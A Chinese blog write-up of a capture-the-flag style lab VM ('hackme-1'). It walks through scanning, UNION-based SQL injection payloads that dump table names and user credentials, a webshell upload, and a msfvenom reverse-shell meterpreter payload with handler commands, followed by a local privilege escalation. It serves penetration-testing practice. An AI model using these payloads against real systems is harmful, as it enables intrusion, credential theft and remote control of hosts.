hackme-1通关

该文描述了对一个IP为192.168.41.145的靶机进行渗透测试的过程,包括信息收集、漏洞探测(发现SQL注入)、获取Shell以及提权等步骤。通过扫描主机、端口,利用SQL注入暴露数据库信息,上传木马文件并通过蚁剑控制,最终实现对系统的进一步控制。
摘要由CSDN通过智能技术生成

靶机ip 192.168.41.145

kali ip 192.168.41.130

全部为NAT模式

一信息收集

步骤一:扫描存在的主机ip

arpscan -l

步骤二 扫描发现主机的开放端口

masscan --rate=100000 -p 0-65535 192.168.41.145

步骤三 敏感目录扫描

dirb http://192.168.41.145

二漏洞探测

步骤一:访问ip地址发现有登陆界面和注册界面 注册一个账号登录 尝试sql注入

步骤二:在对话 分别输入 OSINT OSINT' OSINT’ # 确定存在sql字符型注入

步骤三:判断字段

OSINT' order by 3#   //正常输出
OSINT' order by 4#    //未输出

步骤四:爆出库名

OSINT' UNION SELECT DATABASE(),2,3#   

步骤五:爆表名

-OSINT'union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

步骤六 :爆字段名

-OSINT' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

步骤七:爆字段内容

-OSINT' union select group_concat(user),group_concat(pasword),3 from users#

三 getshell

步骤一:使用爆破出来的登录名和密码进行登录

步骤二:发现其有上传文件的功能,上传一句话木马文件 并使用蚁剑连接

步骤三:使用kali中的msf生成木马文件 将生成的木马文件上传到蚁剑

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.41.130 lport=4444 -f elf >4444.elf

步骤四:在msf设置监听 将上传的木马文件修改权限后运行

msfconsole 
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 192.168.41.145  
set lport 4444 
run 



chomd +x 4444.elf 
./4444.elf

四 提权

步骤一: 在meterpreter内执行指令:

shell
whoami   //查看当前用户

步骤二:切换终端

python -c 'import pty;pty.spawn("/bin/bash")'

步骤三:获取root权限

在home目录下发现文件touchmenot,切换到对应路径下,然后运行文件

cd home/legacy
./touchmenot

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值